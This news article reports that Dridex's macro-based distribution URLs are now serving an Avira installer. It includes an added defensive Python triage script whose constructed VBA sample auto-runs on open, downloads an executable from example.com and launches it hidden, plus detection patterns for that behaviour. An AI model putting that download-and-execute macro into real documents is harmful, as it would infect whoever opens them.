Widely used by cybercriminals to introduce malware onto systems, the Dridex banking trojan has been the subject of a number of high-profile investigations, and of a takedown by US authorities last year.
These things don't stay dead for long, however, and Dridex is back in business. But in an interesting new twist, it seems that part of the Dridex distribution chain has been hijacked to deliver the free Avira antivirus program rather than its usual malicious payload.
Dridex is spread by spam, usually as a Word document carrying malicious macros. Once the file has been opened and macros are enabled, the macro code fetches the payload (the Dridex loader) from a remote server, and the computer is infected. In the latest campaign, though, the download URLs are unchanged but the content served from them has been swapped: the macros now pull down the Avira installer instead.
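As an added illustration, not code from the article or from Avira, the script below does basic triage of the kind of macro-based downloader described above. It assumes the VBA source has already been extracted from the document (for example with olevba from the oletools package) and runs on a constructed macro sample with a reserved example.com URL, not Dridex's actual code. The point it makes is the one the article implies: the document is malicious because of what the macro does (download, write to disk, execute), regardless of what the server happens to be handing out on a given day.

```python
import re

# Constructed sample of VBA macro source, as a defender would see it after
# extraction (e.g. with olevba). Illustrative only; not Dridex's real code.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim x As Object
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", "http://example.com/stats/loader.exe", False
    x.send
    Dim s As Object
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1
    s.Open
    s.Write x.responseBody
    s.SaveToFile Environ("TEMP") & "\update.exe", 2
    Shell Environ("TEMP") & "\update.exe", vbHide
End Sub
'''

# Behavioural indicators of a download-and-execute macro. These are
# hypothetical heuristics chosen for the example, not a vendor signature.
INDICATORS = {
    "auto_exec":   r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b",
    "http_client": r"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile)",
    "file_write":  r"(ADODB\.Stream|SaveToFile|Scripting\.FileSystemObject)",
    "exec":        r"\b(Shell|WScript\.Shell|ShellExecute|CreateProcess)\b",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def analyze_macro(vba_source: str) -> dict:
    """Flag downloader behaviour and pull out the URLs the macro contacts.

    The verdict is keyed on the macro's own behaviour (fetch + write + run),
    not on the payload hash, because whoever controls the server can swap the
    content behind the URL at any time, as happened in the case above.
    """
    found = {
        name: bool(re.search(pattern, vba_source, re.IGNORECASE))
        for name, pattern in INDICATORS.items()
    }
    urls = URL_RE.findall(vba_source)
    downloader = found["http_client"] and found["file_write"] and found["exec"]
    return {
        "indicators": found,
        "urls": urls,          # candidates to block and to watch for content changes
        "downloader": downloader,
    }


if __name__ == "__main__":
    result = analyze_macro(SAMPLE_VBA)
    print("downloader macro:", result["downloader"])
    print("download URLs:", result["urls"])
    print("indicators:", result["indicators"])
```

In practice the URL list is what goes into blocklists and proxy logs; seeing an unexpected binary (such as a legitimate installer) returned from one of these URLs is still an alert, since the client that made the request has already run a malicious macro.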
"The content behind the malware download URL has been replaced, it's now providing an original, up-to-date Avira web installer instead of the usual Dridex loader," says Moritz Kroll, malware expert at Avira.
The company denies that it is behind the modification itself. "We still don't know exactly who is doing this with our installer and why -- but we have some theories," says Kroll. "This is certainly not something we are doing ourselves."
One explanation is that the swap is an attempt to confuse antivirus detection, by making a known-bad distribution channel serve a known-good file. Another is that it is the work of white-hat hackers who want to remain anonymous. "While what they are doing is fundamentally helpful, it is also technically illegal in most countries, so they probably don't want to be known or identifiable," adds Kroll.
You can find out more about this unusual development on the Avira blog.
Image Credit: Julien Tromeur/ Shutterstock